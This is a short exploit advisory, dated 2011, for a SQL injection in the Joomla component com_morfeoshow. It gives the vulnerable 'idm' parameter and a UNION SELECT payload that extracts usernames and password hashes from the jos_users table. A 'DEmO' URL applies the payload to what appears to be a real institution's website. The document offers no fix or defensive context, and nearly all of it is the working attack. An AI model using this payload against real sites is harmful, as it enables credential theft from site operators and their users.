#############################################################
Joomla Component com_morfeoshow SQL Injection Vulnerability
#############################################################


# Author : Th3.xin0x

# Greetz : P0fk - ksha - S[e]C -seth - pks - xacks - OzX All My Friends :)

# special thanks to: www.mitm.cl  - https://foro.undersecurity.net

# Name : Joomla com_morfeoshow

# Bug Type : SQL injection



+--+ Example:
site.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=


+--+ EXPLOIT :
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+


+--+ DEmO

http://www.ucinf.cl/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+


[2011-06-26]